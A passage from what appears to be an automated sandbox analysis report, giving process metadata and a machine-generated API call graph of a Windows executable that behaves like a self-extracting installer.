                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                                                                                            Start time:17:57:36
                                                                                                                                                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Windows Media Player\wmprph.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Windows Media Player\wmprph.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff65e710000
                                                                                                                                                                                                                                                                                                            File size:86'528 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:B4298167D12E6AC4618518E0B6326802
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                                                                              Execution Coverage:28%
                                                                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                              Signature Coverage:41.5%
                                                                                                                                                                                                                                                                                                              Total number of Nodes:927
                                                                                                                                                                                                                                                                                                              Total number of Limit Nodes:45
                                                                                                                                                                                                                                                                                                              execution_graph 2956 7ff7bde78790 SetUnhandledExceptionFilter 2957 7ff7bde78750 2958 7ff7bde78782 2957->2958 2959 7ff7bde7875f 2957->2959 2959->2958 2960 7ff7bde7877b ?terminate@ 2959->2960 2960->2958 2901 7ff7bde75690 2908 7ff7bde73b40 2901->2908 2904 7ff7bde756c2 WriteFile 2905 7ff7bde756f9 2904->2905 2906 7ff7bde756ba 2904->2906 2905->2906 2907 7ff7bde75725 SendDlgItemMessageA 2905->2907 2907->2906 2909 7ff7bde73b4c MsgWaitForMultipleObjects 2908->2909 2910 7ff7bde73be5 2909->2910 2911 7ff7bde73b74 PeekMessageA 2909->2911 2910->2904 2910->2906 2911->2909 2912 7ff7bde73b99 2911->2912 2912->2909 2912->2910 2913 7ff7bde73ba7 DispatchMessageA 2912->2913 2914 7ff7bde73bb8 PeekMessageA 2912->2914 2913->2914 2914->2912 2963 7ff7bde73910 2964 7ff7bde73933 2963->2964 2982 7ff7bde73a09 2963->2982 2967 7ff7bde73948 2964->2967 2968 7ff7bde73a11 GetDesktopWindow 2964->2968 2964->2982 2965 7ff7bde73954 2966 7ff7bde73b1a EndDialog 2966->2965 2970 7ff7bde7397b 2967->2970 2971 7ff7bde7394c 2967->2971 2985 7ff7bde74c68 6 API calls 2968->2985 2970->2965 2973 7ff7bde73985 ResetEvent 2970->2973 2971->2965 2972 7ff7bde7395b TerminateThread 2971->2972 2972->2966 2975 7ff7bde74dcc 24 API calls 2973->2975 2979 7ff7bde739c3 2975->2979 2976 7ff7bde73a9b SetWindowTextA CreateThread 2976->2965 2978 7ff7bde73ae8 2976->2978 2977 7ff7bde73a38 GetDlgItem SendMessageA GetDlgItem SendMessageA 2977->2976 2980 7ff7bde74dcc 24 API calls 2978->2980 2981 7ff7bde739e4 SetEvent 2979->2981 2983 7ff7bde739cc SetEvent 2979->2983 2980->2982 2984 7ff7bde73b40 4 API calls 2981->2984 2982->2965 2982->2966 2983->2965 2984->2982 2986 7ff7bde74d3f SetWindowPos 2985->2986 2988 7ff7bde78470 7 API calls 2986->2988 2989 7ff7bde73a2f 2988->2989 2989->2976 2989->2977 2990 7ff7bde780d0 2991 7ff7bde780e2 2990->2991 2997 7ff7bde78818 GetModuleHandleW 2991->2997 2993 7ff7bde78149 __set_app_type 2994 7ff7bde78186 2993->2994 2995 7ff7bde7819c 2994->2995 2996 7ff7bde7818f __setusermatherr 2994->2996 2996->2995 2998 7ff7bde7882d 2997->2998 2998->2993 2066 7ff7bde78200 2085 7ff7bde78964 2066->2085 2070 7ff7bde7824b 2071 7ff7bde7825d 2070->2071 2072 7ff7bde78277 Sleep 2070->2072 2073 7ff7bde7826d _amsg_exit 2071->2073 2076 7ff7bde78284 2071->2076 2072->2070 2073->2076 2074 7ff7bde782fc _initterm 2077 7ff7bde78319 _IsNonwritableInCurrentImage 2074->2077 2075 7ff7bde782dd 2076->2074 2076->2075 2076->2077 2078 7ff7bde783f8 _ismbblead 2077->2078 2079 7ff7bde7837d 2077->2079 2078->2077 2089 7ff7bde72c54 GetVersion 2079->2089 2082 7ff7bde783c7 exit 2083 7ff7bde783cf 2082->2083 2083->2075 2084 7ff7bde783d8 _cexit 2083->2084 2084->2075 2086 7ff7bde78209 GetStartupInfoW 2085->2086 2087 7ff7bde78990 6 API calls 2085->2087 2086->2070 2088 7ff7bde78a0f 2087->2088 2088->2086 2090 7ff7bde72c7b 2089->2090 2091 7ff7bde72cc3 2089->2091 2090->2091 2093 7ff7bde72c7f GetModuleHandleW 2090->2093 2113 7ff7bde72db4 2091->2113 2093->2091 2095 7ff7bde72c97 GetProcAddress 2093->2095 2095->2091 2096 7ff7bde72cb2 2095->2096 2096->2091 2097 7ff7bde72d7f 2099 7ff7bde72d8b CloseHandle 2097->2099 2100 7ff7bde72d97 2097->2100 2099->2100 2100->2082 2100->2083 2104 7ff7bde72d5e 2107 7ff7bde72d7a 2104->2107 2108 7ff7bde72d67 ExitWindowsEx 2104->2108 2105 7ff7bde72d33 2230 7ff7bde74dcc 2105->2230 2259 7ff7bde71c0c GetCurrentProcess OpenProcessToken 2107->2259 2108->2097 2110 7ff7bde72d29 2110->2097 2110->2104 2110->2105 2114 7ff7bde78b09 2113->2114 2115 7ff7bde72df9 memset memset 2114->2115 2267 7ff7bde75050 FindResourceA SizeofResource 2115->2267 2118 7ff7bde72e53 CreateEventA SetEvent 2119 7ff7bde75050 7 API calls 2118->2119 2122 7ff7bde72e92 2119->2122 2120 7ff7bde74dcc 24 API calls 2123 7ff7bde72fd9 2120->2123 2121 7ff7bde72e96 2125 7ff7bde74dcc 24 API calls 2121->2125 2122->2121 2124 7ff7bde72ed5 2122->2124 2127 7ff7bde72fa3 2122->2127 2299 7ff7bde78470 2123->2299 2128 7ff7bde75050 7 API calls 2124->2128 2129 7ff7bde72eb4 2125->2129 2272 7ff7bde770a8 2127->2272 2132 7ff7bde72eec 2128->2132 2129->2123 2132->2121 2134 7ff7bde72efe CreateMutexA 2132->2134 2134->2127 2135 7ff7bde72f22 GetLastError 2134->2135 2135->2127 2138 7ff7bde72f35 2135->2138 2136 7ff7bde72fb5 2136->2120 2137 7ff7bde72fc4 2139 7ff7bde72fcd 2137->2139 2140 7ff7bde72fde FindResourceExA 2137->2140 2142 7ff7bde72f4a 2138->2142 2143 7ff7bde72f62 2138->2143 2307 7ff7bde7204c 2139->2307 2144 7ff7bde73014 2140->2144 2145 7ff7bde72fff LoadResource 2140->2145 2146 7ff7bde74dcc 24 API calls 2142->2146 2149 7ff7bde74dcc 24 API calls 2143->2149 2147 7ff7bde7301d #17 2144->2147 2148 7ff7bde73029 2144->2148 2145->2144 2150 7ff7bde72f60 2146->2150 2147->2148 2148->2123 2151 7ff7bde7303a 2148->2151 2152 7ff7bde72f7c 2149->2152 2153 7ff7bde72f81 CloseHandle 2150->2153 2322 7ff7bde73bf4 GetVersionExA 2151->2322 2152->2127 2152->2153 2153->2123 2159 7ff7bde730ec 2160 7ff7bde73141 2159->2160 2162 7ff7bde73116 2159->2162 2456 7ff7bde75fe4 2160->2456 2163 7ff7bde73134 2162->2163 2436 7ff7bde760a4 2162->2436 2614 7ff7bde73f74 2163->2614 2169 7ff7bde73236 2172 7ff7bde78470 7 API calls 2169->2172 2174 7ff7bde72ce1 2172->2174 2173 7ff7bde7315b GetSystemDirectoryA 2175 7ff7bde77ba8 CharPrevA 2173->2175 2205 7ff7bde761ec 2174->2205 2176 7ff7bde73186 LoadLibraryA 2175->2176 2177 7ff7bde731c9 FreeLibrary 2176->2177 2178 7ff7bde7319f GetProcAddress 2176->2178 2180 7ff7bde73273 SetCurrentDirectoryA 2177->2180 2181 7ff7bde731e4 2177->2181 2178->2177 2179 7ff7bde731ba DecryptFileA 2178->2179 2179->2177 2182 7ff7bde7320d 2180->2182 2189 7ff7bde73291 2180->2189 2181->2180 2183 7ff7bde731f0 GetWindowsDirectoryA 2181->2183 2186 7ff7bde74dcc 24 API calls 2182->2186 2183->2182 2185 7ff7bde7325a 2183->2185 2184 7ff7bde7331f 2184->2169 2191 7ff7bde72318 18 API calls 2184->2191 2198 7ff7bde73347 2184->2198 2519 7ff7bde76ca4 GetCurrentDirectoryA SetCurrentDirectoryA 2185->2519 2190 7ff7bde7322b 2186->2190 2189->2184 2192 7ff7bde732fb 2189->2192 2195 7ff7bde732cb 2189->2195 2633 7ff7bde77700 GetLastError 2190->2633 2191->2198 2546 7ff7bde75d90 2192->2546 2194 7ff7bde73368 2194->2169 2199 7ff7bde73383 2194->2199 2200 7ff7bde77ac8 28 API calls 2195->2200 2196 7ff7bde73230 2196->2169 2198->2194 2568 7ff7bde740c4 2198->2568 2644 7ff7bde7494c 2199->2644 2201 7ff7bde732f6 2200->2201 2201->2169 2634 7ff7bde7772c 2201->2634 2206 7ff7bde76214 2205->2206 2207 7ff7bde7624c LocalFree LocalFree 2206->2207 2209 7ff7bde76229 SetFileAttributesA DeleteFileA 2206->2209 2215 7ff7bde76273 2206->2215 2207->2206 2208 7ff7bde76311 2210 7ff7bde76387 2208->2210 2212 7ff7bde7632d RegOpenKeyExA 2208->2212 2209->2207 2211 7ff7bde78470 7 API calls 2210->2211 2213 7ff7bde72ce8 2211->2213 2212->2210 2214 7ff7bde7635e RegDeleteValueA RegCloseKey 2212->2214 2213->2097 2213->2110 2219 7ff7bde72318 2213->2219 2214->2210 2215->2208 2216 7ff7bde762f4 SetCurrentDirectoryA 2215->2216 2217 7ff7bde77c40 4 API calls 2215->2217 2218 7ff7bde7204c 16 API calls 2216->2218 2217->2216 2218->2208 2220 7ff7bde72447 2219->2220 2221 7ff7bde72330 2219->2221 2893 7ff7bde72244 GetWindowsDirectoryA 2220->2893 2222 7ff7bde723cb RegOpenKeyExA 2221->2222 2223 7ff7bde7233a 2221->2223 2225 7ff7bde723c3 2222->2225 2226 7ff7bde723fe RegQueryInfoKeyA 2222->2226 2223->2225 2227 7ff7bde7234a RegOpenKeyExA 2223->2227 2225->2110 2228 7ff7bde723a8 RegCloseKey 2226->2228 2227->2225 2229 7ff7bde7237d RegQueryValueExA 2227->2229 2228->2225 2229->2228 2231 7ff7bde74e49 LoadStringA 2230->2231 2245 7ff7bde75024 2230->2245 2233 7ff7bde74eb5 2231->2233 2234 7ff7bde74e73 2231->2234 2232 7ff7bde78470 7 API calls 2236 7ff7bde72d59 2232->2236 2237 7ff7bde74f31 2233->2237 2238 7ff7bde74ec1 2233->2238 2235 7ff7bde77f04 13 API calls 2234->2235 2239 7ff7bde74e78 2235->2239 2236->2097 2236->2104 2242 7ff7bde74f8e LocalAlloc 2237->2242 2244 7ff7bde74f44 2237->2244 2238->2238 2247 7ff7bde74eeb LocalAlloc 2238->2247 2240 7ff7bde74e81 MessageBoxA 2239->2240 2241 7ff7bde77e34 2 API calls 2239->2241 2240->2245 2241->2240 2242->2245 2254 7ff7bde74f2c 2242->2254 2244->2244 2246 7ff7bde74f50 LocalAlloc 2244->2246 2245->2232 2246->2245 2248 7ff7bde74f79 2246->2248 2247->2245 2250 7ff7bde74f14 2247->2250 2251 7ff7bde7114c _vsnprintf 2248->2251 2249 7ff7bde74fbc MessageBeep 2252 7ff7bde77f04 13 API calls 2249->2252 2253 7ff7bde7114c _vsnprintf 2250->2253 2251->2254 2255 7ff7bde74fd3 2252->2255 2253->2254 2254->2249 2256 7ff7bde74fdc MessageBoxA LocalFree 2255->2256 2257 7ff7bde77e34 2 API calls 2255->2257 2256->2245 2257->2256 2260 7ff7bde71c6f LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2259->2260 2262 7ff7bde71c4c 2259->2262 2261 7ff7bde71cec ExitWindowsEx 2260->2261 2260->2262 2261->2262 2264 7ff7bde71c68 2261->2264 2263 7ff7bde74dcc 24 API calls 2262->2263 2263->2264 2265 7ff7bde78470 7 API calls 2264->2265 2266 7ff7bde71d1a 2265->2266 2266->2097 2268 7ff7bde7509b 2267->2268 2269 7ff7bde72e43 2267->2269 2268->2269 2270 7ff7bde750a4 FindResourceA LoadResource LockResource 2268->2270 2269->2118 2269->2136 2270->2269 2271 7ff7bde750e3 memcpy_s FreeResource 2270->2271 2271->2269 2273 7ff7bde77566 2272->2273 2297 7ff7bde770f2 2272->2297 2274 7ff7bde78470 7 API calls 2273->2274 2275 7ff7bde72fb1 2274->2275 2275->2136 2275->2137 2276 7ff7bde7711d CharNextA 2276->2297 2277 7ff7bde771e7 GetModuleFileNameA 2278 7ff7bde7721c 2277->2278 2279 7ff7bde7720f 2277->2279 2278->2273 2364 7ff7bde77d68 2279->2364 2281 7ff7bde776f1 2373 7ff7bde78648 RtlCaptureContext RtlLookupFunctionEntry 2281->2373 2283 7ff7bde771ca 2283->2273 2283->2277 2285 7ff7bde77238 CharUpperA 2286 7ff7bde7766f 2285->2286 2285->2297 2287 7ff7bde74dcc 24 API calls 2286->2287 2288 7ff7bde77692 2287->2288 2289 7ff7bde7769e CloseHandle 2288->2289 2290 7ff7bde776aa ExitProcess 2288->2290 2289->2290 2291 7ff7bde7739d CharUpperA 2291->2297 2292 7ff7bde77346 CompareStringA 2292->2297 2293 7ff7bde773fb CharUpperA 2293->2297 2294 7ff7bde77ce8 IsDBCSLeadByte CharNextA 2294->2297 2295 7ff7bde77492 CharUpperA 2295->2297 2296 7ff7bde772d0 CharUpperA 2296->2297 2297->2273 2297->2276 2297->2281 2297->2283 2297->2285 2297->2291 2297->2292 2297->2293 2297->2294 2297->2295 2297->2296 2369 7ff7bde77ba8 2297->2369 2300 7ff7bde78479 2299->2300 2301 7ff7bde72cd4 2300->2301 2302 7ff7bde784d0 RtlCaptureContext RtlLookupFunctionEntry 2300->2302 2301->2097 2301->2159 2303 7ff7bde78557 2302->2303 2304 7ff7bde78515 RtlVirtualUnwind 2302->2304 2379 7ff7bde78494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2303->2379 2304->2303 2308 7ff7bde72213 2307->2308 2311 7ff7bde72086 2307->2311 2309 7ff7bde78470 7 API calls 2308->2309 2310 7ff7bde72222 2309->2310 2310->2123 2312 7ff7bde720dc FindFirstFileA 2311->2312 2312->2308 2313 7ff7bde720fe 2312->2313 2314 7ff7bde72138 lstrcmpA 2313->2314 2315 7ff7bde721a3 2313->2315 2316 7ff7bde721d9 FindNextFileA 2313->2316 2320 7ff7bde77ba8 CharPrevA 2313->2320 2321 7ff7bde7204c 8 API calls 2313->2321 2314->2316 2317 7ff7bde72158 lstrcmpA 2314->2317 2318 7ff7bde721b4 SetFileAttributesA DeleteFileA 2315->2318 2316->2313 2319 7ff7bde721f5 FindClose RemoveDirectoryA 2316->2319 2317->2313 2317->2316 2318->2316 2319->2308 2320->2313 2321->2313 2326 7ff7bde73c59 2322->2326 2329 7ff7bde73c4f 2322->2329 2323 7ff7bde74dcc 24 API calls 2336 7ff7bde73f05 2323->2336 2324 7ff7bde78470 7 API calls 2325 7ff7bde73042 2324->2325 2325->2123 2337 7ff7bde712ec 2325->2337 2328 7ff7bde73db1 2326->2328 2326->2329 2326->2336 2380 7ff7bde72834 2326->2380 2328->2329 2330 7ff7bde73eb7 MessageBeep 2328->2330 2328->2336 2329->2323 2329->2336 2393 7ff7bde77f04 2330->2393 2333 7ff7bde73ed3 MessageBoxA 2333->2336 2336->2324 2338 7ff7bde714b5 2337->2338 2339 7ff7bde7133c 2337->2339 2341 7ff7bde78470 7 API calls 2338->2341 2427 7ff7bde711cc LoadLibraryA 2339->2427 2343 7ff7bde714da 2341->2343 2343->2123 2356 7ff7bde77ac8 FindResourceA 2343->2356 2344 7ff7bde7134d GetCurrentProcess OpenProcessToken 2344->2338 2345 7ff7bde71377 GetTokenInformation 2344->2345 2346 7ff7bde714a0 CloseHandle 2345->2346 2347 7ff7bde713a0 GetLastError 2345->2347 2346->2338 2347->2346 2348 7ff7bde713b5 LocalAlloc 2347->2348 2348->2346 2349 7ff7bde713d2 GetTokenInformation 2348->2349 2350 7ff7bde713fc AllocateAndInitializeSid 2349->2350 2351 7ff7bde71491 LocalFree 2349->2351 2350->2351 2352 7ff7bde71445 2350->2352 2351->2346 2353 7ff7bde71481 FreeSid 2352->2353 2354 7ff7bde71452 EqualSid 2352->2354 2355 7ff7bde71476 2352->2355 2353->2351 2354->2352 2354->2355 2355->2353 2357 7ff7bde77b63 2356->2357 2358 7ff7bde77b03 LoadResource 2356->2358 2360 7ff7bde74dcc 24 API calls 2357->2360 2358->2357 2359 7ff7bde77b1d DialogBoxIndirectParamA FreeResource 2358->2359 2359->2357 2363 7ff7bde77b87 2359->2363 2361 7ff7bde77b82 2360->2361 2361->2363 2363->2129 2365 7ff7bde77dd9 2364->2365 2368 7ff7bde77d88 2364->2368 2365->2278 2366 7ff7bde77d90 IsDBCSLeadByte 2366->2368 2367 7ff7bde77db6 CharNextA 2367->2365 2367->2368 2368->2366 2368->2367 2370 7ff7bde77bc8 2369->2370 2370->2370 2371 7ff7bde77bec CharPrevA 2370->2371 2372 7ff7bde77bda 2370->2372 2371->2372 2372->2297 2374 7ff7bde786c7 2373->2374 2375 7ff7bde78685 RtlVirtualUnwind 2373->2375 2378 7ff7bde78494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2374->2378 2375->2374 2381 7ff7bde72a2f 2380->2381 2391 7ff7bde72872 2380->2391 2383 7ff7bde72a41 GlobalFree 2381->2383 2384 7ff7bde72a50 2381->2384 2383->2384 2384->2328 2385 7ff7bde728a5 GetFileVersionInfoSizeA 2386 7ff7bde728c2 GlobalAlloc 2385->2386 2385->2391 2386->2381 2387 7ff7bde728e1 GlobalLock 2386->2387 2387->2381 2388 7ff7bde728fc GetFileVersionInfoA 2387->2388 2389 7ff7bde72920 VerQueryValueA 2388->2389 2388->2391 2390 7ff7bde729ed GlobalUnlock 2389->2390 2389->2391 2390->2391 2391->2381 2391->2385 2391->2390 2392 7ff7bde729d9 GlobalUnlock 2391->2392 2408 7ff7bde7261c 2391->2408 2392->2381 2394 7ff7bde78076 2393->2394 2395 7ff7bde77f44 GetVersionExA 2393->2395 2397 7ff7bde78470 7 API calls 2394->2397 2395->2394 2396 7ff7bde77f6d 2395->2396 2396->2394 2399 7ff7bde77f90 GetSystemMetrics 2396->2399 2398 7ff7bde73eca 2397->2398 2398->2333 2404 7ff7bde77e34 2398->2404 2399->2394 2400 7ff7bde77fa7 RegOpenKeyExA 2399->2400 2400->2394 2401 7ff7bde77fdc RegQueryValueExA RegCloseKey 2400->2401 2401->2394 2403 7ff7bde78026 2401->2403 2402 7ff7bde78065 CharNextA 2402->2403 2403->2394 2403->2402 2405 7ff7bde77edd 2404->2405 2406 7ff7bde77e5a EnumResourceLanguagesA 2404->2406 2405->2333 2406->2405 2407 7ff7bde77e9f EnumResourceLanguagesA 2406->2407 2407->2405 2409 7ff7bde7265b CharUpperA CharNextA CharNextA 2408->2409 2410 7ff7bde727e0 GetSystemDirectoryA 2408->2410 2411 7ff7bde727dd 2409->2411 2412 7ff7bde7269c 2409->2412 2413 7ff7bde727f1 2410->2413 2411->2410 2415 7ff7bde727c7 GetWindowsDirectoryA 2412->2415 2420 7ff7bde726a6 2412->2420 2414 7ff7bde72805 2413->2414 2416 7ff7bde77ba8 CharPrevA 2413->2416 2417 7ff7bde78470 7 API calls 2414->2417 2415->2413 2416->2414 2418 7ff7bde72814 2417->2418 2418->2391 2419 7ff7bde77ba8 CharPrevA 2421 7ff7bde72705 RegOpenKeyExA 2419->2421 2420->2419 2421->2413 2422 7ff7bde72738 RegQueryValueExA 2421->2422 2423 7ff7bde7276b 2422->2423 2424 7ff7bde727b4 RegCloseKey 2422->2424 2425 7ff7bde72774 ExpandEnvironmentStringsA 2423->2425 2426 7ff7bde72792 2423->2426 2424->2413 2425->2426 2426->2424 2428 7ff7bde712bb 2427->2428 2429 7ff7bde71221 GetProcAddress 2427->2429 2430 7ff7bde78470 7 API calls 2428->2430 2431 7ff7bde712ac FreeLibrary 2429->2431 2432 7ff7bde7123f AllocateAndInitializeSid 2429->2432 2433 7ff7bde712ca 2430->2433 2431->2428 2432->2431 2434 7ff7bde71288 FreeSid 2432->2434 2433->2338 2433->2344 2434->2431 2437 7ff7bde75050 7 API calls 2436->2437 2438 7ff7bde760bf LocalAlloc 2437->2438 2439 7ff7bde760dd 2438->2439 2440 7ff7bde7610b 2438->2440 2441 7ff7bde74dcc 24 API calls 2439->2441 2442 7ff7bde75050 7 API calls 2440->2442 2443 7ff7bde760fb 2441->2443 2444 7ff7bde7611d 2442->2444 2657 7ff7bde77700 GetLastError 2443->2657 2446 7ff7bde7615a lstrcmpA 2444->2446 2447 7ff7bde76121 2444->2447 2449 7ff7bde7618a 2446->2449 2450 7ff7bde76174 LocalFree 2446->2450 2448 7ff7bde74dcc 24 API calls 2447->2448 2453 7ff7bde7613f LocalFree 2448->2453 2451 7ff7bde74dcc 24 API calls 2449->2451 2452 7ff7bde73123 2450->2452 2454 7ff7bde761ac LocalFree 2451->2454 2452->2160 2452->2163 2452->2169 2453->2452 2455 7ff7bde76100 2454->2455 2455->2452 2457 7ff7bde75050 7 API calls 2456->2457 2458 7ff7bde76001 2457->2458 2459 7ff7bde76006 2458->2459 2460 7ff7bde7604a 2458->2460 2461 7ff7bde74dcc 24 API calls 2459->2461 2462 7ff7bde75050 7 API calls 2460->2462 2469 7ff7bde76025 2461->2469 2463 7ff7bde76063 2462->2463 2464 7ff7bde7772c 13 API calls 2463->2464 2465 7ff7bde7606f 2464->2465 2466 7ff7bde73146 2465->2466 2467 7ff7bde76073 2465->2467 2466->2169 2470 7ff7bde766c4 2466->2470 2468 7ff7bde74dcc 24 API calls 2467->2468 2468->2469 2469->2466 2471 7ff7bde75050 7 API calls 2470->2471 2472 7ff7bde76706 LocalAlloc 2471->2472 2473 7ff7bde76756 2472->2473 2474 7ff7bde76726 2472->2474 2475 7ff7bde75050 7 API calls 2473->2475 2476 7ff7bde74dcc 24 API calls 2474->2476 2477 7ff7bde76768 2475->2477 2478 7ff7bde76744 2476->2478 2479 7ff7bde7676c 2477->2479 2480 7ff7bde767a5 lstrcmpA LocalFree 2477->2480 2682 7ff7bde77700 GetLastError 2478->2682 2482 7ff7bde74dcc 24 API calls 2479->2482 2483 7ff7bde767ec 2480->2483 2484 7ff7bde76837 2480->2484 2487 7ff7bde7678a LocalFree 2482->2487 2493 7ff7bde764e4 53 API calls 2483->2493 2486 7ff7bde76b14 2484->2486 2490 7ff7bde7684f GetTempPathA 2484->2490 2485 7ff7bde76749 2488 7ff7bde7674f 2485->2488 2489 7ff7bde77ac8 28 API calls 2486->2489 2487->2488 2491 7ff7bde78470 7 API calls 2488->2491 2489->2488 2492 7ff7bde76872 2490->2492 2500 7ff7bde768a5 2490->2500 2494 7ff7bde73153 2491->2494 2658 7ff7bde764e4 2492->2658 2496 7ff7bde7680c 2493->2496 2494->2169 2494->2173 2496->2488 2498 7ff7bde76814 2496->2498 2499 7ff7bde74dcc 24 API calls 2498->2499 2499->2485 2500->2488 2501 7ff7bde76adb GetWindowsDirectoryA 2500->2501 2502 7ff7bde768f9 GetDriveTypeA 2500->2502 2506 7ff7bde76ca4 38 API calls 2501->2506 2504 7ff7bde76916 GetFileAttributesA 2502->2504 2517 7ff7bde76911 2502->2517 2504->2517 2506->2500 2507 7ff7bde764e4 53 API calls 2507->2500 2508 7ff7bde76ca4 38 API calls 2508->2517 2509 7ff7bde76955 GetDiskFreeSpaceA 2511 7ff7bde76983 MulDiv 2509->2511 2509->2517 2510 7ff7bde72468 25 API calls 2510->2517 2511->2517 2512 7ff7bde76a02 GetWindowsDirectoryA 2512->2517 2513 7ff7bde77ba8 CharPrevA 2514 7ff7bde76a2a GetFileAttributesA 2513->2514 2515 7ff7bde76a40 CreateDirectoryA 2514->2515 2514->2517 2515->2517 2516 7ff7bde76a6d SetFileAttributesA 2516->2517 2517->2488 2517->2501 2517->2502 2517->2504 2517->2508 2517->2509 2517->2510 2517->2512 2517->2513 2517->2516 2518 7ff7bde764e4 53 API calls 2517->2518 2518->2517 2520 7ff7bde76d12 2519->2520 2521 7ff7bde76d3f GetDiskFreeSpaceA 2519->2521 2522 7ff7bde74dcc 24 API calls 2520->2522 2523 7ff7bde76f63 memset 2521->2523 2524 7ff7bde76d80 MulDiv 2521->2524 2525 7ff7bde76d2f 2522->2525 2736 7ff7bde77700 GetLastError 2523->2736 2524->2523 2527 7ff7bde76dae GetVolumeInformationA 2524->2527 2717 7ff7bde77700 GetLastError 2525->2717 2530 7ff7bde76e45 SetCurrentDirectoryA 2527->2530 2531 7ff7bde76de6 memset 2527->2531 2529 7ff7bde76f7b GetLastError FormatMessageA 2533 7ff7bde76fbd 2529->2533 2539 7ff7bde76e6c 2530->2539 2718 7ff7bde77700 GetLastError 2531->2718 2532 7ff7bde76d34 2535 7ff7bde76f41 2532->2535 2536 7ff7bde74dcc 24 API calls 2533->2536 2540 7ff7bde78470 7 API calls 2535->2540 2538 7ff7bde76fd8 SetCurrentDirectoryA 2536->2538 2537 7ff7bde76dfe GetLastError FormatMessageA 2537->2533 2538->2535 2541 7ff7bde76eb4 2539->2541 2544 7ff7bde76ed8 2539->2544 2542 7ff7bde7326f 2540->2542 2543 7ff7bde74dcc 24 API calls 2541->2543 2542->2169 2542->2180 2543->2532 2544->2535 2719 7ff7bde724f8 2544->2719 2547 7ff7bde75050 7 API calls 2546->2547 2548 7ff7bde75dab FindResourceA LoadResource LockResource 2547->2548 2549 7ff7bde75dfc 2548->2549 2564 7ff7bde75fcf 2548->2564 2550 7ff7bde75e08 GetDlgItem ShowWindow GetDlgItem ShowWindow 2549->2550 2551 7ff7bde75e56 2549->2551 2550->2551 2737 7ff7bde75c60 #20 2551->2737 2554 7ff7bde75e69 #20 2555 7ff7bde75e5f 2554->2555 2556 7ff7bde75ed1 #22 2554->2556 2559 7ff7bde74dcc 24 API calls 2555->2559 2557 7ff7bde75f55 2556->2557 2558 7ff7bde75f15 #23 2556->2558 2561 7ff7bde75f75 2557->2561 2562 7ff7bde75f61 FreeResource 2557->2562 2558->2555 2558->2557 2560 7ff7bde75f53 2559->2560 2560->2557 2563 7ff7bde75f9f 2561->2563 2565 7ff7bde75f81 2561->2565 2562->2561 2563->2564 2566 7ff7bde75fb1 SendMessageA 2563->2566 2564->2201 2567 7ff7bde74dcc 24 API calls 2565->2567 2566->2564 2567->2563 2569 7ff7bde74118 2568->2569 2586 7ff7bde7412f 2568->2586 2570 7ff7bde75050 7 API calls 2569->2570 2570->2586 2571 7ff7bde74145 memset 2571->2586 2572 7ff7bde74254 2573 7ff7bde74dcc 24 API calls 2572->2573 2574 7ff7bde74273 2573->2574 2575 7ff7bde744ee 2574->2575 2577 7ff7bde78470 7 API calls 2575->2577 2578 7ff7bde744ff 2577->2578 2578->2194 2579 7ff7bde745d8 2579->2575 2582 7ff7bde745f2 RegOpenKeyExA 2579->2582 2580 7ff7bde742f5 CompareStringA 2580->2579 2580->2586 2581 7ff7bde744df LocalFree 2581->2575 2582->2575 2587 7ff7bde74627 RegQueryValueExA 2582->2587 2583 7ff7bde74599 2585 7ff7bde74dcc 24 API calls 2583->2585 2589 7ff7bde745b8 LocalFree 2585->2589 2586->2571 2586->2572 2586->2575 2586->2579 2586->2580 2586->2581 2586->2583 2588 7ff7bde75050 7 API calls 2586->2588 2594 7ff7bde744ad LocalFree 2586->2594 2597 7ff7bde741fd CompareStringA 2586->2597 2611 7ff7bde74394 2586->2611 2764 7ff7bde71684 2586->2764 2803 7ff7bde71d28 memset memset RegCreateKeyExA 2586->2803 2830 7ff7bde7473c CreateProcessA 2586->2830 2591 7ff7bde7471c RegCloseKey 2587->2591 2592 7ff7bde7466c memset GetSystemDirectoryA 2587->2592 2588->2586 2589->2575 2591->2575 2595 7ff7bde7469d 2592->2595 2596 7ff7bde746b3 2592->2596 2594->2579 2594->2586 2599 7ff7bde77ba8 CharPrevA 2595->2599 2598 7ff7bde7114c _vsnprintf 2596->2598 2597->2586 2602 7ff7bde746dc RegSetValueExA 2598->2602 2599->2596 2600 7ff7bde743a5 GetProcAddress 2603 7ff7bde74521 2600->2603 2600->2611 2601 7ff7bde74574 2604 7ff7bde74dcc 24 API calls 2601->2604 2602->2591 2607 7ff7bde74dcc 24 API calls 2603->2607 2606 7ff7bde74597 2604->2606 2608 7ff7bde74553 LocalFree 2606->2608 2609 7ff7bde74544 FreeLibrary 2607->2609 2855 7ff7bde77700 GetLastError 2608->2855 2609->2608 2611->2600 2611->2601 2612 7ff7bde744d3 FreeLibrary 2611->2612 2613 7ff7bde74480 FreeLibrary 2611->2613 2845 7ff7bde779f0 2611->2845 2612->2581 2613->2594 2615 7ff7bde75050 7 API calls 2614->2615 2616 7ff7bde73f8b LocalAlloc 2615->2616 2617 7ff7bde73fdd 2616->2617 2618 7ff7bde73fad 2616->2618 2619 7ff7bde75050 7 API calls 